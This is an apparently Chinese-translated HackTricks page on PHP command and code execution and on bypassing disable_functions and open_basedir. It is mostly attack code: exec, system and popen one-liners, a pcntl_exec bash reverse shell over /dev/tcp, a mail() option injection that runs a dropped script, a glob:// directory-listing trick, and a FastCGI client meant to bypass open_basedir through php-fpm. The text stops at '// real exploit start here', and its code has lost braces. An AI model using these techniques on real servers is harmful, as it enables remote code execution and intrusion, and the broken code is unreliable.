PHP - Useful Functions & disable_functions/open_basedir bypass

支持 HackTricks

PHP 命令与代码执行

PHP 命令执行

注意: 一个 p0wny-shell php webshell 可以 自动 检查并绕过以下函数,如果其中一些被禁用。

exec - 返回命令输出的最后一行

echo exec("uname  -a");

passthru - 直接将命令输出传递给浏览器

echo passthru("uname -a");

system - 将命令输出直接传递给浏览器并返回最后一行

echo system("uname -a");

shell_exec - 返回命令输出

echo shell_exec("uname -a");

`` (反引号) - 与 shell_exec() 相同

echo `uname -a`

popen - 打开到命令进程的读或写管道

echo fread(popen("/bin/ls /", "r"), 4096);

proc_open - 类似于 popen() 但控制程度更高

proc_close(proc_open("uname -a",array(),$something));


<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

pcntl_exec - 执行一个程序(在现代和不太现代的 PHP 中,默认情况下您需要加载 模块才能使用此函数)

pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/ 0>&1"]);

mail / mb_send_mail - 此函数用于发送邮件,但也可以被滥用以在 $options 参数中注入任意命令。这是因为 php mail 函数 通常在系统内部调用 sendmail 二进制文件,并允许您 添加额外选项。然而,您将无法看到执行命令的输出,因此建议创建一个将输出写入文件的 shell 脚本,通过邮件执行它,并打印输出:

file_put_contents('/www/', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/', 0777);  mail('', '', '', '', '-H \"exec /www/\"'); echo file_get_contents('/tmp/flag.txt');

dl - 此函数可用于动态加载 PHP 扩展。此函数并不总是存在,因此在尝试利用它之前,您应该检查它是否可用。阅读此页面以了解如何利用此函数

PHP 代码执行

除了 eval,还有其他方法可以执行 PHP 代码:include/require 可用于以本地文件包含和远程文件包含漏洞的形式进行远程代码执行。

${<php code>}              // If your input gets reflected in any PHP string, it will be executed.
assert()                   //  identical to eval()
preg_replace('/.*/e',...)  // e does an eval() on the match
create_function()          // Create a function and use eval()

$func = new ReflectionFunction($_GET['func_name']);
// or

// or serialize/unserialize function

disable_functions & open_basedir

禁用函数是可以在PHP的.ini文件中配置的设置,它将禁止使用指定的函数Open basedir是指示PHP可以访问的文件夹的设置。 PHP设置通常配置在路径 /etc/php7/conf.d 或类似位置。


open_basedir Bypass

open_basedir将配置PHP可以访问的文件夹,你将无法在这些文件夹之外读/写/执行任何文件,而且你甚至无法列出其他目录。 然而,如果你能够执行任意PHP代码,你可以尝试以下代码块来尝试绕过限制。

使用 glob:// 绕过列出目录


$file_list = array();
$it = new DirectoryIterator("glob:///v??/run/*");
foreach($it as $f) {
$file_list[] = $f->__toString();
$it = new DirectoryIterator("glob:///v??/run/.*");
foreach($it as $f) {
$file_list[] = $f->__toString();
foreach($file_list as $f){
echo "{$f}<br/>";

注意1:在路径中,您还可以使用 /e??/* 来列出 /etc/* 和其他任何文件夹。 注意2:看起来代码的某部分是重复的,但这实际上是必要的! 注意3:此示例仅用于列出文件夹,而不是读取文件。

完全的 open_basedir 绕过利用 FastCGI

如果您想要了解更多关于 PHP-FPM 和 FastCGI的信息,可以阅读本页的第一部分。 如果**php-fpm已配置,您可以利用它完全绕过open_basedir**:

请注意,您需要做的第一件事是找到php-fpm 的 unix socket在哪里。它通常位于 /var/run 下,因此您可以使用之前的代码列出目录并找到它。 来自这里的代码。

* Note : Code is released under the GNU LGPL
* Please do not change the header of this file
* This library is free software; you can redistribute it and/or modify it under the terms of the GNU
* Lesser General Public License as published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
* This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU Lesser General Public License for more details.
* Handles communication with a FastCGI application
* @author      Pierrick Charron <>
* @version     1.0
class FCGIClient
const VERSION_1            = 1;
const BEGIN_REQUEST        = 1;
const ABORT_REQUEST        = 2;
const END_REQUEST          = 3;
const PARAMS               = 4;
const STDIN                = 5;
const STDOUT               = 6;
const STDERR               = 7;
const DATA                 = 8;
const GET_VALUES           = 9;
const GET_VALUES_RESULT    = 10;
const UNKNOWN_TYPE         = 11;
const MAXTYPE              = self::UNKNOWN_TYPE;
const RESPONDER            = 1;
const AUTHORIZER           = 2;
const FILTER               = 3;
const REQUEST_COMPLETE     = 0;
const CANT_MPX_CONN        = 1;
const OVERLOADED           = 2;
const UNKNOWN_ROLE         = 3;
const MAX_CONNS            = 'MAX_CONNS';
const MAX_REQS             = 'MAX_REQS';
const MPXS_CONNS           = 'MPXS_CONNS';
const HEADER_LEN           = 8;
* Socket
* @var Resource
private $_sock = null;
* Host
* @var String
private $_host = null;
* Port
* @var Integer
private $_port = null;
* Keep Alive
* @var Boolean
private $_keepAlive = false;
* Constructor
* @param String $host Host of the FastCGI application
* @param Integer $port Port of the FastCGI application
public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket
$this->_host = $host;
$this->_port = $port;
* Define whether or not the FastCGI application should keep the connection
* alive at the end of a request
* @param Boolean $b true if the connection should stay alive, false otherwise
public function setKeepAlive($b)
$this->_keepAlive = (boolean)$b;
if (!$this->_keepAlive && $this->_sock) {
* Get the keep alive status
* @return Boolean true if the connection should stay alive, false otherwise
public function getKeepAlive()
return $this->_keepAlive;
* Create a connection to the FastCGI application
private function connect()
if (!$this->_sock) {
//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);
$this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5);
if (!$this->_sock) {
throw new Exception('Unable to connect to FastCGI application');
* Build a FastCGI packet
* @param Integer $type Type of the packet
* @param String $content Content of the packet
* @param Integer $requestId RequestId
private function buildPacket($type, $content, $requestId = 1)
$clen = strlen($content);
return chr(self::VERSION_1)         /* version */
. chr($type)                    /* type */
. chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
. chr($requestId & 0xFF)        /* requestIdB0 */
. chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */
. chr($clen & 0xFF)             /* contentLengthB0 */
. chr(0)                        /* paddingLength */
. chr(0)                        /* reserved */
. $content;                     /* content */
* Build an FastCGI Name value pair
* @param String $name Name
* @param String $value Value
* @return String FastCGI Name value pair
private function buildNvpair($name, $value)
$nlen = strlen($name);
$vlen = strlen($value);
if ($nlen < 128) {
/* nameLengthB0 */
$nvpair = chr($nlen);
} else {
/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
$nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
if ($vlen < 128) {
/* valueLengthB0 */
$nvpair .= chr($vlen);
} else {
/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
$nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
/* nameData & valueData */
return $nvpair . $name . $value;
* Read a set of FastCGI Name value pairs
* @param String $data Data containing the set of FastCGI NVPair
* @return array of NVPair
private function readNvpair($data, $length = null)
$array = array();
if ($length === null) {
$length = strlen($data);
$p = 0;
while ($p != $length) {
$nlen = ord($data{$p++});
if ($nlen >= 128) {
$nlen = ($nlen & 0x7F << 24);
$nlen |= (ord($data{$p++}) << 16);
$nlen |= (ord($data{$p++}) << 8);
$nlen |= (ord($data{$p++}));
$vlen = ord($data{$p++});
if ($vlen >= 128) {
$vlen = ($nlen & 0x7F << 24);
$vlen |= (ord($data{$p++}) << 16);
$vlen |= (ord($data{$p++}) << 8);
$vlen |= (ord($data{$p++}));
$array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen);
$p += ($nlen + $vlen);
return $array;
* Decode a FastCGI Packet
* @param String $data String containing all the packet
* @return array
private function decodePacketHeader($data)
$ret = array();
$ret['version']       = ord($data{0});
$ret['type']          = ord($data{1});
$ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});
$ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});
$ret['paddingLength'] = ord($data{6});
$ret['reserved']      = ord($data{7});
return $ret;
* Read a FastCGI Packet
* @return array
private function readPacket()
if ($packet = fread($this->_sock, self::HEADER_LEN)) {
$resp = $this->decodePacketHeader($packet);
$resp['content'] = '';
if ($resp['contentLength']) {
$len  = $resp['contentLength'];
while ($len && $buf=fread($this->_sock, $len)) {
$len -= strlen($buf);
$resp['content'] .= $buf;
if ($resp['paddingLength']) {
$buf=fread($this->_sock, $resp['paddingLength']);
return $resp;
} else {
return false;
* Get Informations on the FastCGI application
* @param array $requestedInfo information to retrieve
* @return array
public function getValues(array $requestedInfo)
$request = '';
foreach ($requestedInfo as $info) {
$request .= $this->buildNvpair($info, '');
fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));
$resp = $this->readPacket();
if ($resp['type'] == self::GET_VALUES_RESULT) {
return $this->readNvpair($resp['content'], $resp['length']);
} else {
throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
* Execute a request to the FastCGI application
* @param array $params Array of parameters
* @param String $stdin Content
* @return String
public function request(array $params, $stdin)
$response = '';
$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
$paramsRequest = '';
foreach ($params as $key => $value) {
$paramsRequest .= $this->buildNvpair($key, $value);
if ($paramsRequest) {
$request .= $this->buildPacket(self::PARAMS, $paramsRequest);
$request .= $this->buildPacket(self::PARAMS, '');
if ($stdin) {
$request .= $this->buildPacket(self::STDIN, $stdin);
$request .= $this->buildPacket(self::STDIN, '');
fwrite($this->_sock, $request);
do {
$resp = $this->readPacket();
if ($resp['type'] == self::STDOUT || $resp['type'] == self::STDERR) {
$response .= $resp['content'];
} while ($resp && $resp['type'] != self::END_REQUEST);
if (!is_array($resp)) {
throw new Exception('Bad request');
switch (ord($resp['content']{4})) {
case self::CANT_MPX_CONN:
throw new Exception('This app can\'t multiplex [CANT_MPX_CONN]');
case self::OVERLOADED:
throw new Exception('New request rejected; too busy [OVERLOADED]');
case self::UNKNOWN_ROLE:
throw new Exception('Role value not known [UNKNOWN_ROLE]');
return $response;
// real exploit start here